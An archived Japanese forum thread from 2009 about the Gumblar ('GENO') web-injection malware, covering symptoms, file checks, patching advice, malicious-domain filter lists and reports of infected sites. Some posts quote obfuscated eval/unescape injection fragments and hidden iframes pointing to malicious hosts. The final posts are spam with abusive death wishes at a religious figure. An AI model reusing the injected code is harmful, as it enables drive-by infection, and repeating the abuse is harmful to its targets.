GENOウイルススレ　感染2台目

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

前スレ
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/internet/1242450264/

感染予防対策

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Readeｒ以外の環境設定をどうするかも各自考える必要があります。

以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん：攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

>>1
テンプレの症状にある「再起動時にBSOD」は、起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認

【感染の確認方法】■ Windows XP（５月１８日現在）
　１　C:\WINDOWS\system32\sqlsodbc.chmを開いて壊れていたら感染濃厚　
　２　↑のファイルサイズを確認する
　　正常値　　日本語版ヘルプ　 50,727 bytes
　　　　　　　　英語版ヘルプ 　　　46133
　　　　　　　　ドイツ語ヘルプ 48401
　　　　　　　　フランス語ヘルプ 49345
　　　　　　　　スペイン語ヘルプ 48475

　改竄されたsqlsodbc.chmの一例
　 サイズが1.29 KB (1,323 バイト)
　更新日は2009年3月21日


　:
　　

Aviraたん何か更新きた

Virus definition file 7.01.03.218 2009/05/18

Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。

初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです

Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
正常な場合50，727バイト(日本語)です。

仕事行って来たんだけど、昨日の夜から何か出来事あった？

>>1
スレ立て乙。
ちとしばらく潜るわ。
動作が不安定になる種も探したいし。

>>7
VistaUltimateでは多言語での利用が可能ですが、複数sqlsodbc.chmが存在する場合はインストール済みの言語分存在する・・・かもしれません。

>>1乙
同人板は既に8スレ目であり、現状スレタイで質問禁止になっている

>>1 乙

情報多すぎて混乱してる人は、とにもかくにもAdobe製ツールを最新に
ブラウザ毎に最新にするんだぞ

>>12
とりあえずXPだけまとめてみた
cmdもregeditも無問題でスキャンもすり抜けらしいので

vistaの改変例てどこかありましたか？
あと２ｋの判定方法も

>>13
何故かスレタイは無視して良いってことになってる。

>>15
sqlsodbc.chmだがテンプレだと2kには無いってあるが家の2kSP4の奴には>7の英字版ヘルプと同サイズのが入ってた
だからこれも環境依存、かねぇ？

乙なんじゃないのかな

>>17
感染すると2kにもsqlsodbc.chmが出来るって聞きましたが

>>1　乙です
間違って　zlkonウイルス擦れ　行ってたw

火狐の先読みって切らなくても大丈夫なん？

>>5
起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの？

>>19
あぁ、普段ネットワークに繋いでない非常時起動用の奴（ウィンアプデとかの時だけ繋ぐ）なんで
感染して作られたっつー可能性は低い、と思う（ヘルプとして開くしね）

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

これって上が正しいの？
もうまとめすら見るのが怖いんだが

>>17
Windows 2000には標準では存在しない。
標準ではsqlsodbc.hlpしかない。
Visual StudioやMSDE、MSSQLをインストールすると入ると思う。
あるいはMDAC(Microsoft Data Access Components)をインストールしても
入る。


動作が不安定になる種が落ちてこないなぁ。

2ｋだけど
C:\WINDOWS
これがまずないんだがフォルダごと作られるってこと？
C:\WINNT\system32になら
sqlsodbc.hlpとsqlsodbc.GIDてのあったからかわりにここに作られる？

>>24
どちらも安全

>>21
切っておこうぜ

>>26
おっしゃるとおり、2kの場合はC:\WINDOWSを
C:\WINNTとして置き換えないといけない

>>27
ありがと
早くノートン対応してほしい・・・おちおちネットもしてられないなんて

>>26
作られるとしたら、%Windir%のC:\WinNT以下のフォルダのはず。

>>25
あぁ仕事用としても使えるように当初作ったからその辺入ってるな。安心した

>>26
win2kの場合WINNTがデフォルト（NTの名残）XPになってWINDOWSがデフォルトに（Win95系終焉して統合したから）
なのでXPで\WINDOWS〜って時は2kだと\WINNT〜と読み替えるのが基本

>>29,31,32
なるほど
ありがとうございます

>>32
ちなみにMDAC 2.8日本語版のsqlsodbc.chmのサイズは50,727 バイト(2003/06/27 17:06:44)
だった。

手書きブログ感染って本当？
ウイルスチェッカーでは調べることが出来ないんでわかる人居たら教えて

>>5
これ試してみたけど、今飼ってるおとなしい奴はネットワークアダプタ
殺したり、ケーブル抜いたりしても普通に立ち上がるな。

>>35
チェッカーにかけなくてもソース見ればいいと思うよ

FirefoxでAdblockPlus使ってるんだけど、気休めにフィルタ追加してみた
これで利くのかな？

*/94.229.[64-79].[0-255]/*
*/94.247.[2-3].[0-255]/*
*/95.129.[144-145].[0-255]/*
gumblar.cn
zlkon.lv
martuz.cn
bigtopsuper.cn
findyourbigwhy.cn

>>36
怖すぎるだろそれ…

まだ絶対クラッシュしてくれる方がありがたい。
自分が感染しているかどうか確証が持てない方が怖すぎる。

>>35
google-analyticsの呼び出しでunescape使ってるから誤検知したんじゃないかな？

>>37
ざっとソースみても疑わしいものはなかったよ
それに手書きブログ踏んでみたけどavastたん反応しなかったし


詳しい人まじ詳細おね

>>1に書いてある症状でこのスレで追試できたのをまとめて欲しいな。

>>35
リンク集の方にURL載ってるが詳しくはわからん
報告ありしか書いてないからガセの可能性高い

>>37
前使ったことあって気になったから調べてみたけどchromeもavastも怒らない
jsファイル含め怪しい箇所もない
やっぱりgoogleのタグ誤検知かと

>>41
出たのがVIPで誰も相手にしてない感じだしガセなんじゃない？
手ブロのスレッドでも誰も何も言ってないし

安価ミス
>>44は>>37じゃなくて>>41ね

>>40
誤検知かな・・・誤検知だったらいいんだが


>>43
本当にガセなのかわかればいいんだがあいにく私は調べ方わからんからなあ・・


>>44
やっぱりそうなのかな
とりあえず様子見てみることにするよ

手ブロ見に行ってみたけどavastは暴走しなかったな
普通に見れるしソースもそんなおかしいのないしガセっぽいね

>>35
ぱっと見では大丈夫そう
どうでもいいけど、そこソースが割と綺麗だな
ある程度手打ちで書いたのか

ttp://pipa.jp/tegaki　怪しいスクリプト入っていません

ガセですね　

ネットカフェのＰＣって再起動したら設定とかもとに戻るんだっけ？
自ＰＣでどこが安全か調べるのが怖いから
ネカフェ行ったほうがいいんだろうか。

http://geno.2ch.tc/index.php?url=http://pipa.jp/tegaki/

＞URLでないと判断されました。
＞評価ミス報告

そもそもこのチェッカーがおかしいと思うんだ
どういう風に組んだらこういう結果が出るんだよ

みなさん本当にありがとうございます
一応誤検知だということでいいですかね？
因みに>>47は私ですすいません


パソコンからじゃ書き込めないんで携帯から失礼しました

>>51
感染したらどうするつもり？

>>52
それを組んだのはセキュ板の方？

>>52
やってみたけど
診断できるぞ？

>危険度0%
>安全なURLです。踏んでも大丈夫でしょう。

誰か評価ﾐｽ送ったのかな？

【鑑定目的禁止】検出可否報告スレ10　より転載

gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。

sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

このマルウェアは、感染時に元の実行ファイル（martuz.cnから落ちてくるxxxx.exe）の方を消去（証拠隠滅）
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

感染してるサイトをこのチェッカーで調べても
なんも出てこないの俺だけ？

使ってないから知らんけど、チェックしてるページが違うとか

俺もやってみたけど0％だった
昨日の成美堂はちゃんとなったんだけどな

>>5
別の種で試してみたら、再現した。
前の種で再現しなかったのは、いったんmartuz.cnに接続して
アクティブになったら発動しないってことなのかも？？

鳥骨鶏とかリボンマジックが0になる

あ、ごめんちゃんとなった

烏骨鶏やっとサイト閉じたな

確認する際は、キャッシュをしっかり削除してから。

とりあえず、ここまでF-Secure SASからの回答なし。
今夜くらいから動いてくれるのかね…今10時くらいだと思うし。

＞980 192.168.0.774 sage 2009/05/18(月) 15:27:48 ID:gw0F+TVl0
＞通称「GENOウイルス」・同人サイト向け対策まとめ
＞ttp://www31.atwiki.jp/doujin_vinfo/pages/24.html
＞にある
＞ウイルスバスター2009（ver.17.1.1251）のファイアウォール設定
＞ですが
＞ttp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
＞の注意書きにある ・・・

もう一度読み直してみるとGENOウイルスの動作では
同人サイトのファイアウォールの設定は危険ではないか

その設定をよく見ると、
例外ルール（プロトコル）のみの設定しかなく
例外ルール（プログラム）側のInternet Explorerのデフォルトが全て許可なので
実際に試したわけでないが、そこから抜けると思われ

>>48
おそらく unescapeの文字を見かけて危険と判断したと思われ。
…といっても、google-analytics.com のアクセス解析のみで、問題となるコードが無いか目視で確認しましたが、特に見当たりません。

>>6
＞�Bavast!（無料のアンチウイルスソフト）で確認

だから、そこ消して！！

Avastは、スクリプトが仕込まれたページの大半（反応しないものも確認されています）で反応しますが
落ちてきた本体に感染しているかどうかのチェックには使えません。

ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
ここのニュースを読むと犯人は中国のドメイン名だが、
サイトはロシアでホストに移動して活動しているとあるけど

この大元から犯人が捕まる可能性ってどのぐらいなんだ？
ウイルス作って逮捕されたやつ沢山いるが日本県警じゃムリだろうか

GenoVirus感染サイトリストで、感染の疑いがあるサイトのalfa-radio●comは、
ソース見る限り感染してるように見えないんだがどうだろう？

>>69
海外でも感染広がってるらしいから日本県警より海外の警察に任せたほうがよさそうだな

>>59
チェッカーは精度に問題あるから。

>>70
現時点では感染してる様子はありませんね。ソース見たけど入ってない。

なんかテンプレが古いな
gumblar.cnとかavastとかNoScriptとか

新種はmartuz.cn
avastは>>68
Fxを使用していてもNoScriptを使用する必要はないし
ブラウザもFxである必要はない
というかブラウザ依存のウイルスではないので
ブラウザを指定する必要はない。
ちょろめだけJSをオフれないということなのでそこだけ注意すればいいかと

>>69
中国、ロシア辺りだとおそらく無理だろなぁ…
ネトゲの垢ハックとかで被害届出してゲーム運営がログ提供しても最終的に中国とかロシアとかその手の方面で
追跡不能〜ってなるのがほとんどだそうだ。

ノートンのファイアウォールもウイルスバスターより癖が強いから
設定の甘さでファイアウォールをしていてもなんの意味を持たないことにもなる
もう一度下記サイトの各種設定を見直す必要があると思われ
http://www31.atwiki.jp/doujin_vinfo/pages/24.html

http://genolists.alink.uic.to/
ここの管理人の人まだ見てるかな？
リストが増えてきたんで、重複とか、タレコミを受けて閉鎖対処したサイトとか、
あとろくに自力で調べもしない人が噂だけ鵜呑みにして「確定サイト」扱いで登録した白サイトとかあるから
できれば管理人権限で整理してくれると助かります

っていうかちゃんと役に立ってるのかな？このリスト

【議論OK】GENOウイルス晒しスレ
http://changi.2ch.net/test/read.cgi/doujin/1242615305/

>>71
海外の警察のほうが頼りになるか
そうだな

>>70
私も見ましたけど怪しいスクリプトは無いですね

いっそロシアンマフィアのPCクラッシュさせて消されればいい

>>75
イギリスに移動したとあるからその辺に期待
アメリカにいかないのは危険だと思っているのだろうかやはり

>>70
俺も大丈夫だと思うけど、どうだろうな
>>40辺りの理由かも

今回のウイルスは巨大botnetを作るのが目的だとか？
どこかのサイトで見ました。犯罪者集団ですね

>>77
微妙な所だね
自分でも感染サイト探してるけどなかなか難しい

>>8
週末に騒ぎが始まってから
ずっと１時間おきくらいにうpだて手動チェックしてるが
ログ見返したら25回くらい更新があった
日本語じゃないせいか全然話題に上らないが
これはちゃんと仕事してくれてると思っていいんだよな？

>>84
so-net　セキュリティ通信
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1890

これだね

>>78
avastたん反応したんだが
なにこれ

>>88
avastが反応するようなコードが名前欄に貼ってあるから

>>88
Avastが今回の騒ぎに使われてるJavascriptの一部分をシグニチャとして持ってて、
その文字列を含んでるので反応する。
一時期流行ったLoveLetterの一部貼ってノートン反応するのと一緒。

>>89
なんだ・・
URLのよく出来た釣りに引っ掛かったのかと思った

>>77
それ編集とか削除するためには登録者のパスワードが必要だよね。
有志が編集できるように共通のパス決めといた方がいいと思うんだが。「geno」とか。

>>78
おい専ブラなのにavast怒ったぞ。
スレ一覧全部飛んだじゃねーか死ね

なんでこんな深刻な被害ありそうなのに
２ｃｈの一部でしか警戒されてないんだ？
今までのウイルスも最初はこんな感じなのかな？

>>91
専ブラで2ch見てるなら、専ブラのフォルダを除外指定すれば
その手のテキストで書かれただけのソースコードは引っ掛からなくなるよ

>>84,>>87
こっちのほうがハッキリ書いてある。

http://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html

>>94
見た目が派手じゃないから

幼女ウィルスみたいに具体的に何されてるか分からないからなぁ

>>92
そうなんだよね、登録者or管理者でないと編集・削除が出来ないから
重複や誤報のURLの削除を迅速にするには、それが一番いい
次回からgenoで統一してもらうようにする？

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

(){eval(unescape(('Script(t,'%')))})(/./g);
この文字列をNGワードにすれば良いのでは？
これはウイルスではありませんので安心してください。

おい更新したらavastが反応したぞコラ

>>99
とりあえず俺が登録するときはパスは「geno」にしときますわ

>>99
パスワードを知った愉快犯が変にいじくってしまったらどうする？

更新したら心臓止まりそうになったわ

GENO　URLチェッカーは、まだ未完成と・・・・
GENOウィルスツールの検出精度ってどうなんだろ？

スレ更新したら反応したんだけど･･･
マジでやめてくれよ

統計的に有意性を取ってみたいが検証する暇がない

セキュ板の本スレ何なんだ、いつの間にか二桁いってるし
GENO感染時にいたみんなはここに避難したかんじかな？

>>78 のスレ、avastが反応するな

ここもavast反応するんだが…

Virus definition file 7.01.03.218 2009/05/18
Virus definition file 7.01.03.219 2009/05/18
Virus definition file 7.01.03.220 2009/05/18

Avira今日だけで３回更新ｗ

どこのバカだウイルスのコード貼ったの
ａｖａｓｔさん激怒でアクセスできなくなったじゃねーか！

>>109
ここに引っ越してますよ＾＾

avastたんかわいいよavastたん

この程度で騒ぐな情弱ども

このスレでavastが反応する人は
タスクのavastアイコンクリックして標準シールド→詳細な設定→追加設定タブで
下のところにある除外設定で専ブラのフォルダ指定すれ

>>101
ウィルスコードだな
このスレまで反応したぞｗ
2のログでAVASTがうぃーんうぃーんするのは慣れてるからコードとは思ったが
知らない人は驚くな

>>94
感染してるの気付きにくいから

ここの住民はほとんどセキュ板と同じだと思ってたけど違うのな

単純に文字列追ってるんだな>avast

>>104
とりあえず魚拓取っておいた。
このCGIにバックアップ機能があるのかわからないが、
もしないなら定期的に魚拓取っておいてそこから復旧すればいいんでないか

>>109
もうあっちは隔離スレになったよ

ｐ２使っている俺はどうすれバインダー

p://www■mikesquarter■com/

感染確認したが、海外のサイトな上、コンタクトが（感染するスクリプトのあるページの）フォームなので、
サイト管理者への連絡はパス。

専ブラじゃないんだが

おい、ここもかよ
コード貼るなら無効にしてからはれよ

検体スレにも書きましたが、

F-Sercure SAS登録分の回答で、
検体報告のあったmartuz.cn新種（2009/05/17版）については次回DB更新にて対応とのこと。

ほんと無能やつってジャマだわ
黙って無効化ろよ

>>78
うちのアバたんが全く反応しない

ttp://genolists.alink.uic.to/　ここの鉄道110号のページは確定↓

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://gumblar.cn/rss/%3Fid%3D&client=chromium&hl=ja

昨日、>>2の感染予防対策 とIEのスプリクトをよく解らないから全部無効にした後
やけにパソコンが重いからタスクマネージャーで調べたら

cmdが勝手に起動
カスペルのアップデートが３０分経っても５％
Windows Updateｻｲﾄも最終段階で弾かれる
ワンケアも弾かれた

ｃｍｄを閉じWindows Updateの指示にしたがい操作したら無事Update終了
常駐させてるカスペルも元に戻った

sqlsodbc.chmのサイズは問題なし。再起動も問題なく出来た
ワンケアのオンラインスキャンだけはまだ出来ない・・・
情弱なので感染してるのかしてないのか謎

>>109
向うは早すぎて、時間が無いとついていけない
あっちは流し読みして、こっちをメインの情報源にしてる

ttp://www.3nell.net/geno/
genoウイルス臨時できてるよ

fc2公式で注意促してんのな
ttp://web.fc2.com/
既出？

>>134
既出だな

>>131
してないと思うよ

>>101
このコードを他スレに貼って遊んでる奴が居るぞ

>>134
このスレでは初。
ｆｃ２は、トップで注意しかしないのか？
ブログ所有者ににメールおくったりしないのか？

fc2はずっと前から注意促してたぞ
少なくとも5月頭くらいには

>>53
確認したがウイルスは存在しなかった

聖帝♂♂検索これも確定

(function(ajr0d){eval(unescape(('>76ar>20a>3d>22>53cript
E>6eg>69ne>22>2c>62>3d>22>56ers>69>6f>6

結局sqlsodbc.chmを書き換えないタイプのって見つかってるのかな？

そかすまん
まぁ、fc2に感染者多いから当然とはいえちょっとだけfc2に好感を持った

>>138
日付間違えてる
FC2は今朝のブログのメンテ日付も１日ずらして予告してらから、
社員全員ずれてるのかもだがｗ

今日もGENOウイルスまとめWiki重かったら、ミラー作ってもいいかね？

fc2未来に生きてるｗ

>>136
大丈夫ですかね少し安心しました

>>144,146
それはたぶんｆｃ2が日本にないからだと思うんだ
ttp://fc2.com/company.html

以下感染済みを確認。
kitagawadaisuke (トップページとコンサートページ以外が感染されてることを確認)
loca.zombie.jp(トップページ)

>>144
今日の日付が分かっていないｆｃ２の社員は嫌過ぎるｗ

>>145
いいと思うけど、なるべく軽いのお願い。

>>134
日付間違ってるね。

ＦＣ２、アク解からリンク元に飛ぶ時のページにも注意書き増えたよな？


ソフォス使ってるんだけど更新出来てるのか不安なんでアバスト入れたいんだけど、競合するかな？

これ実行してみ

printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);
LoadLibrary("winmm.dll");
Sleep(1000);
printf("%02X %02X\n",*(BYTE*)WSASend,*(BYTE*)send);

いまの常駐仕様なら…。

>>148
それは元から
主なユーザーが日本なのも元から

お知らせとかも普段は間違えてないんだよ
先週末くらいからおかしいの

・対処済みor対処中or元から白？
手書きブログ
livmail
スカイハイプレミアム
Carwash
成美○出版
テイアラモード
帰ってき○三日天下
烏骨鶏
株式会社まどか
リボンマジック
ALFA alfa-radio.com
TALK LIVE ANIMATED

・404
Akemi ○ayashi Website

・未確認の中の黒確定
loca.zombie.jp

・重複登録
Replica
Tシャツ通販サイト
kitagawadaisuke
主上支局−小野不由美さーち−

主上支局はカスペが見せてくれなかったので、GENOに感染してるかどうかは不明

火狐でアクセスしたら怒った！ｗ

とりあえず登録だけした
http://wikiwiki.jp/geno/
まだパス作成されてないからたぶん今はアクセスできないと思う

>>95
Jane Styleは警告でない。出た人いる？
Janeのフォルダは検査除外にはしてない
Fxで開くとAVASTさん劇怒りだったのでAVASTさんは生きていると思われるが

スレに挙がってる感染してるページ見て回ってるけど、
全部</head>と<body>との間なんだな

>>156
確定情報？

グーグルの画像検索で感染サイトの画像が出てもだいじょうぶですか？

>>162
画像は別に問題ない

>>156
主上支局は↓
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://ssfos.hp.infoseek.co.jp/&client=chromium&hl=ja

>>164
そのサイト怪しすぎるだろ
hXXp://basesrv.net/bin/in.php
謎のURLあるし

●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。

●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。

●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。

その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。

>>160
書こうとおもったら>>166であがってた…OTL

>>161
とりあえず、loca■zombie■jp は黒

とりあえずssfos●hp●infoseek●co●jpにあったもの
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F000007.ru%2Fin.cgi%3F2
rame src="hXXp://basesrv.net/bin/in.php" width=1 height=1 style="visibility:hidden"
q="=hgs`ld!rsb<iuuq;..c`rdrsw/odu.cho.ho/qiq!vheui<0!idhfiu<0!ruxmd<&whrhchmhux;iheedo&?=.hgs`ld?";w="";for(i=0;i<q.length;i++){w=w+String.from
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fipredator.ru%2F7%2Fin.cgi%3F3%22%20width%3D%2
http://theoschepens.nl/phpmycounter/the
など
アドレス少し加工済み

>>166-167
サンクス

すまん非常に怪しいPHPカウンター（？）のURL加工忘れてた

ソースチェッカー
http://so.7walker.net/guide.php
あやしいサイトはここで見れ

>>111
ついさっき7.01.03.221が来た

>>172
そこ負荷すごいらしくて、さっき使おうとしたら一時規制食らったｗ

>>172
GENOウイルス感染サイトのチェック増加により、サイトへのアクセスが集中しています。

なお、この新ウイルスに対してSCOのチェックフィルタは対応しておりません。
(ソースが難読化されている上に、パターンがすべて違うためです。。。)

簡単な判別方法としてはHTMLソース内JavaScript記述部分に、
「unescape」や「eval」といった文字列が含まれ、
意味不明な文字列が続いていれば危険とみなしてよいでしょう。

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://theoschepens.nl/phpmycounter/the&client=chromium&hl=ja
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://basesrv.net/&client=chromium&hl=ja

セキュ板のスレが機能していないので、こっちに書き込んでみる

------------------------------------------------------

Genoウィルスってブラウザ上からPDFを立ち上げるのか、それとも単独でAdobeReaderを立ち上げるのかどっち？

役に立つかわからんが、もし前者だとしたら、Firefox のアドオン→プラグインからAdobe Acrobatを無効化することで
ブラウザ上でPDFが開けなくなり、代わりにダウンロードウィンドウが立ち上がるので、意図しないダウンロードを予防できる気がしてきた。

聞きたいことがあるんだが

感染したやつが感染したPCでwikiとか編集したら
そのwikiって感染すんの？

>>177
前者
>>178
それはない

>>179
ないのか
勘違いだったようだな、サンクス

>>179
thx
これでReaderからの侵入は確実に潰せそうだ。

>>181
何かものすごい勘違いをしているような気がしないでもない

てか感染ルートってPDFとFlashだしな
よく使われる手としてJavaScript経由ってのがあるだけだし

>>・Adobe Flash Player をブラウザごとに最新（10.0.22.87）にする。
これのやり方がよくわからないので教えてもらえませんか？
ブラウザはFirefox3.0.10です

>>122
ニュー即・・・XP厨ｖｓVista厨状態
同人・・・・・・自分ルール押しつけで話が混乱し、ループしてる
セキュ板・・・VIPっぽい状態

>>184
flash playerでぐぐった一番上のサイト見て見ろ

>>184
IE と Firefox 別々にアクセスしてダウン→インスト
ttp://get.adobe.com/jp/flashplayer/

インストする前に、ブラウザは終了しとく

>>185
むむお主セキュ板の方にいるだろ

>>186,187
ありがとうございます

ごめん寝てた
リンク作った人だけど何かやることある？

>>184
今から入るよ。今入ったよ。ほら、半分入ってるよ。

感染リンク集立てた奴、白は消した方がいいんじゃないか
っつーかパスかけてないなら俺らも消せるのか？
http://genolists.alink.uic.to/

>>190
修正済みのやつとか誤報告とか消して

バスターまだ動かないんかな
他のとこは動き出したんだっけ？ノートン先生とか

そろそろ言っておきたいんだけど
「GENOウイルス」って言うのは正確に説明できない（USBウィルスと同じ）言葉なので使うの止めよう
現象、対策も間違っているの多すぎ！
だからWisdom of Crowdになり得ないんだよ2chは…

JavaScriptを切るとyoutubeやニコ動などの動画が見れなくなって不便って書き込みいくつかあったけど
AdobeReaderの環境設定で「Acrobat JavaScriptを使用」のチェック外してOKしても問題なく動画見れるんですが
これってJavaScriptを切れてないってことでしょうか？

A
1.js - javaScript無効
2.id=2(reader) - reader最新,Flash最新
3.id=10(exe) - antivirussoft対応待

B
1.IPblock - hosts,router,FW,IPfilteringsoft
2.etc - firefox,NoScript,ABP,vista

>>195
間違っている思うのは、ぜひ報告してほしい

取り敢えず対策済みor誤報告用のカテゴリ作っておいた
登録されてるサイトの中で当てはまるのがあれば突っ込んでくれれば、感染確認カテゴリから削除しておくぜ

>>188
いいえ、メインはニュー即です。向こうに間違えて書き込んじゃったの、見てますよね。

しかしNorton先生、毎度毎度細かい更新があって、専ブラが読み込んだVBSナントカには敏感に反応するのに
このスレのコードには全く反応なしですね。なんか不安になってきます。

そんなこと今から、GENOウイルスではなくて
別の名前にしろといわれても。

>>196
JavaScriptを切れてない

ブラウザ（IEやらOperaやらFireFoxやら)のJavaScriptも切るんだ
そうすっとﾆｺ動等見れなくなる(対策としては正常)

前スレの822-823
いくらJavaScriptが効いてたとはいえ
何気に最新Adobeが突破されてるのは結局どうなったんだろう

前スレのVISTAでの話しですが
>>951
「パスおよびファイル名が正しいか確認してください」って出て保存できない。
上書き保存だよね？
自分、常に管理者でログインしてるはずなんだけどな…

GENO系って呼ぶようにはしてるけど
GENOが作ってるわけでもないが、GENOに起爆点が感染したことで、
この界隈で一気に有名になったんだな

>>196
Adobe Readerはpdf形式のファイルを見るviewer
なので、Adobe Readerのjavascrpitを無効にしたら、pdf形式の脆弱性をつくケースは対応される。

他の人が言っている javascritp を切るは IE や Firefox などの ウェブブラウザーの設定のことを言っている。

で、フラッシュ動画が普通に見られてるということは、ブラウザーの設定で javascrpt が有効になったまま。

>>203
え、突破されたの？

>>204
Vista使ってないからエスパーレスだけど、ファイルが書き込み禁止とかなってない？
あるいは管理者なのに書き込み権限が無いとか（これは多分無い）

>>207
クズは黙ってろ

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

創価糞学会の糞池田大作キチガイ創価の糞池田糞大作クソ公明党のクソ池田大作死ね

